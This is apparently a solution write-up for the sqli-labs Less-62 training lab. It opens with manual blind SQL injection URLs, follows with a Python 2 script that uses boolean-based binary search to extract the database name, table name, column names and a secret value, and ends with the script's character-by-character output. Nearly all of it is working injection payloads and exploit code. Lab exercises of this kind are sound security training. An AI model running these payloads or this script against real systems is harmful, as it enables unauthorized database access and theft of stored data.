http://192.168.136.128/sqli-labs-master/Less-62/?id=1'

http://192.168.136.128/sqli-labs-master/Less-62/?id=1'%23

http://192.168.136.128/sqli-labs-master/Less-62/?id=1')%23

http://192.168.136.128/sqli-labs-master/Less-62/?id=1') and ascii(substr((select database()),1,1))=98%23

http://192.168.136.128/sqli-labs-master/Less-62/?id=1') and ascii(substr((select database()),1,1))=99%23

http://192.168.136.128/sqli-labs-master/Less-62/?id=1') and ascii(substr((select table_name from information_schema.tables where table_schema='challenges'),1,1))=87%23

http://192.168.136.128/sqli-labs-master/Less-62/?id=1') and ascii(substr((select secret_1O45 from WOJXNS9PWT),1,1))=49%23

# -- coding: utf-8 --

# version: python 2.7

# file: less62.py

# time: 2018.2.4

# author: superkrissV

import urllib

import urllib2

headers={

        'Host': 'localhost',

        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',

        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',

        'Accept-Encoding': 'gzip, deflate'

        }

target_url = "http://localhost/sqli-labs-master/Less-62/?id=1"

success_str = "Your Login name"

# ')闭合

length_payload = "') and length(%s)>=%d #"

char_payload = "') and ascii(substr(%s, %d, 1))>=%d #"

table_name = "(select table_name from information_schema.tables where table_schema='%s' limit %d,1)"

column_name = "(select column_name from information_schema.columns where table_schema='%s' and table_name='%s' limit %d,1)"

column_data = "(select %s from %s.%s limit %d, 1)"

ascii_start = 33

ascii_end = 126

max_length = 50

count = 0

# 构造对应的payload并发送

def sendRequest(payload):

    global count

    count += 1

    url = target_url + urllib.quote(payload)

#    print url

    try:

        request = urllib2.Request(url=url, headers=headers)

        response = urllib2.urlopen(request)

        if success_str in response.read():

            return True

        return False

    except urllib2.HTTPError as e:

        return False

# 利用递归和二分法获取长度

def getLength(start, end, command):

    if (start+1) == end:return start

    mid = (end+start) / 2

    if sendRequest(length_payload % (command, mid)):

        start = mid

    else:

        end = mid

#    print start,"    ",end

    result = getLength(start, end, command)

    return result

# 返回pos位置的字符的ascii码值

def getSingleChar(start, end, command, pos):

    if (start+1) == end:return start

    mid = (end+start) / 2

    if sendRequest(char_payload % (command, pos, mid)):

        start = mid

    else:

        end = mid

#    print start,"    ",end

    result = getSingleChar(start, end, command, pos)

    return result

def getInfo(command):

    i = 1

    info = ""

    maxLen = getLength(1, max_length, command)

    print command, " length:", maxLen

    while(1):

        if i > maxLen:break

        info += chr(getSingleChar(ascii_start, ascii_end, command, i))

        i += 1

        print info

getInfo("database()")

getInfo(table_name % ("challenges",0))

getInfo(column_name % ("challenges","ah5ketrxy1",0))

getInfo(column_name % ("challenges","ah5ketrxy1",1))

getInfo(column_name % ("challenges","ah5ketrxy1",2))

getInfo(column_data % ("secret_DRXQ","challenges", "ah5ketrxy1",0))

print "Count: ", count

E:\python_scripts\dvwa>python less62.py

database()  length:

c

ch

cha

chal

chall

challe

challen

challeng

challenge

challenges

(select table_name from information_schema.tables where table_schema='challenges' limit ,)  length:

a

ah

ah5

ah5k

ah5ke

ah5ket

ah5ketr

ah5ketrx

ah5ketrxy

ah5ketrxy1

(select column_name from information_schema.columns where table_schema='challenges' and table_name='ah5ketrxy1' limit ,)  length:

i

id

(select column_name from information_schema.columns where table_schema='challenges' and table_name='ah5ketrxy1' limit ,)  length:

s

se

ses

sess

sessi

sessid

(select column_name from information_schema.columns where table_schema='challenges' and table_name='ah5ketrxy1' limit ,)  length:

s

se

sec

secr

secre

secret

secret_

secret_D

secret_DR

secret_DRX

secret_DRXQ

(select secret_DRXQ from challenges.ah5ketrxy1 limit , )  length:

c

cL

cLi

cLit

cLitv

cLitvi

cLitviU

cLitviUK

cLitviUKt

cLitviUKt6

cLitviUKt6b

cLitviUKt6b0

cLitviUKt6b0l

cLitviUKt6b0lM

cLitviUKt6b0lM1

cLitviUKt6b0lM1X

cLitviUKt6b0lM1XE

cLitviUKt6b0lM1XEo

cLitviUKt6b0lM1XEoD

cLitviUKt6b0lM1XEoD1

cLitviUKt6b0lM1XEoD1X

cLitviUKt6b0lM1XEoD1XK

cLitviUKt6b0lM1XEoD1XKA

cLitviUKt6b0lM1XEoD1XKA2

Count: